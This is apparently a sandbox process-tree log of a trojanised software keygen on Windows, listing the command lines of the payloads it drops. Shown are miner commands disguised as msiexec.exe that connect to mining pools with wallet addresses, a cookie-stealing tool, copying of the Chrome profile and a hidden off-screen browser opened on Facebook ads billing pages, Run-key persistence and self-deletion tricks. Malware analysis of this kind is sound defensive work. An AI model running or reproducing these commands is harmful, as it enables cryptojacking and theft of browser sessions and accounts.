"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff82e7c6e00,0x7ff82e7c6e10,0x7ff82e7c6e20
6⤵
PID:416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1468,3404693082024467906,3927040434163532428,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1512 /prefetch:2
6⤵
PID:4760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1468,3404693082024467906,3927040434163532428,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1900 /prefetch:8
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1468,3404693082024467906,3927040434163532428,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2168 /prefetch:8
6⤵
PID:4284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,3404693082024467906,3927040434163532428,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1
6⤵
PID:4428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,3404693082024467906,3927040434163532428,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:1
6⤵
PID:3940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,3404693082024467906,3927040434163532428,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
6⤵
PID:1808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,3404693082024467906,3927040434163532428,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
6⤵
PID:1104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,3404693082024467906,3927040434163532428,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
6⤵
PID:1976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,3404693082024467906,3927040434163532428,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
6⤵
PID:2640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,3404693082024467906,3927040434163532428,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2488 /prefetch:8
6⤵
PID:3876

C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4516

C:\Users\Admin\AppData\Roaming\6E46.tmp.exe
"C:\Users\Admin\AppData\Roaming\6E46.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5060

C:\Users\Admin\AppData\Roaming\6E46.tmp.exe
"C:\Users\Admin\AppData\Roaming\6E46.tmp.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1836

C:\Users\Admin\AppData\Roaming\6F80.tmp.exe
"C:\Users\Admin\AppData\Roaming\6F80.tmp.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4256

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
6⤵
PID:4828

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
6⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
5⤵
PID:2916

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:1988

C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5104

C:\ProgramData\1531098.exe
"C:\ProgramData\1531098.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156

C:\ProgramData\7769434.exe
"C:\ProgramData\7769434.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4436

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
6⤵
- Executes dropped EXE
PID:640

C:\ProgramData\3414248.exe
"C:\ProgramData\3414248.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5052

C:\ProgramData\3414248.exe
"{path}"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\ProgramData\8868173.exe
"C:\ProgramData\8868173.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4132

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:1752

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4916

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:1884

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:1792

C:\Users\Admin\AppData\Local\Temp\Temp2_R_R_Report_Writer_8_keygen.zip\R_R_Report_Writer_8_keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_R_R_Report_Writer_8_keygen.zip\R_R_Report_Writer_8_keygen.exe"
1⤵
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "
2⤵
PID:2836

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:4260

C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5056

C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:4500

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:476

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
PID:4568

C:\Users\Admin\AppData\Roaming\8FA6.tmp.exe
"C:\Users\Admin\AppData\Roaming\8FA6.tmp.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4328

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\8FA6.tmp.exe"
5⤵
PID:4764

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:4268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-2.exe" >> NUL
4⤵
PID:1232

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:1360

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:3884

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"
4⤵
PID:4348

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:1944

C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:4796

C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1452

C:\Users\Admin\AppData\Local\Temp\RarSFX5\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\askinstall20.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:2064

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:4852

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
5⤵
- Enumerates system info in registry
PID:4528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff82e5e6e00,0x7ff82e5e6e10,0x7ff82e5e6e20
6⤵
PID:1400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1608,5387840775596573179,11956503329929119593,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2208 /prefetch:8
6⤵
PID:4936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1608,5387840775596573179,11956503329929119593,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1664 /prefetch:8
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,5387840775596573179,11956503329929119593,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:2
6⤵
PID:632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,5387840775596573179,11956503329929119593,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2720 /prefetch:1
6⤵
PID:3712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,5387840775596573179,11956503329929119593,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2712 /prefetch:1
6⤵
PID:4940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,5387840775596573179,11956503329929119593,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
6⤵
PID:1160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,5387840775596573179,11956503329929119593,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
6⤵
PID:5080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,5387840775596573179,11956503329929119593,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
6⤵
PID:4996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,5387840775596573179,11956503329929119593,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:1
6⤵
PID:4956

C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1132

C:\Users\Admin\AppData\Roaming\D72E.tmp.exe
"C:\Users\Admin\AppData\Roaming\D72E.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4452

C:\Users\Admin\AppData\Roaming\D72E.tmp.exe
"C:\Users\Admin\AppData\Roaming\D72E.tmp.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:824

C:\Users\Admin\AppData\Roaming\D923.tmp.exe
"C:\Users\Admin\AppData\Roaming\D923.tmp.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:512

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
6⤵
PID:4964

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
6⤵
- Blocklisted process makes network request
PID:2168

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"
5⤵
PID:4948

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:1268

C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2152

C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe"
4⤵
- Executes dropped EXE
PID:4232

C:\ProgramData\733416.exe
"C:\ProgramData\733416.exe"
5⤵
PID:3620

C:\ProgramData\4431655.exe
"C:\ProgramData\4431655.exe"
5⤵
- Suspicious behavior: SetClipboardViewer
PID:4972

C:\ProgramData\5560095.exe
"C:\ProgramData\5560095.exe"
5⤵
- Suspicious use of SetThreadContext
PID:2192

C:\ProgramData\5560095.exe
"{path}"
6⤵
PID:3544

C:\ProgramData\2019020.exe
"C:\ProgramData\2019020.exe"
5⤵
PID:1100

C:\Users\Admin\AppData\Local\Temp\RarSFX5\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX5\gcttt.exe"
4⤵
PID:3740

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:4504

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:1284

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:4624

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:3652

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4748

C:\Users\Admin\AppData\Local\Temp\Temp2_R_R_Report_Writer_8_keygen.zip\R_R_Report_Writer_8_keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_R_R_Report_Writer_8_keygen.zip\R_R_Report_Writer_8_keygen.exe"
1⤵
PID:1680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX4\keygen.bat" "
2⤵
PID:4116

C:\Users\Admin\AppData\Local\Temp\RarSFX4\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:2852

C:\Users\Admin\AppData\Local\Temp\RarSFX6\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX6\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2396

C:\Users\Admin\AppData\Local\Temp\RarSFX6\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX6\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:1144

C:\Users\Admin\AppData\Local\Temp\RarSFX4\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:4136

C:\Users\Admin\AppData\Local\Temp\RarSFX4\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
PID:4692

C:\Users\Admin\AppData\Roaming\DFAA.tmp.exe
"C:\Users\Admin\AppData\Roaming\DFAA.tmp.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4620

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\DFAA.tmp.exe"
5⤵
PID:4908

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:4028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\keygen-step-2.exe" >> NUL
4⤵
PID:4296

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:4252

C:\Users\Admin\AppData\Local\Temp\RarSFX4\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:4264

C:\Users\Admin\AppData\Local\Temp\RarSFX7\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX7\Setup.exe"
4⤵
- Executes dropped EXE
PID:3140

C:\Users\Admin\AppData\Local\Temp\RarSFX7\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX7\askinstall20.exe"
4⤵
- Executes dropped EXE
PID:4304

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:5024

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:4608

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
5⤵
- Enumerates system info in registry
PID:4428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
5⤵
PID:4564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff82e5e6e00,0x7ff82e5e6e10,0x7ff82e5e6e20
6⤵
PID:4396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,5488907694821861236,3258511368988689618,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1596 /prefetch:8
6⤵
PID:3868

C:\Users\Admin\AppData\Local\Temp\RarSFX7\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX7\file.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2172

C:\Users\Admin\AppData\Roaming\2C44.tmp.exe
"C:\Users\Admin\AppData\Roaming\2C44.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:896

C:\Users\Admin\AppData\Roaming\2C44.tmp.exe
"C:\Users\Admin\AppData\Roaming\2C44.tmp.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:412

C:\Users\Admin\AppData\Roaming\304C.tmp.exe
"C:\Users\Admin\AppData\Roaming\304C.tmp.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:1272

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
6⤵
PID:2188

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
6⤵
- Blocklisted process makes network request
PID:184

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX7\file.exe"
5⤵
PID:3708

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4396

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:1844

C:\Users\Admin\AppData\Local\Temp\RarSFX7\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX7\md2_2efs.exe"
4⤵
- Executes dropped EXE
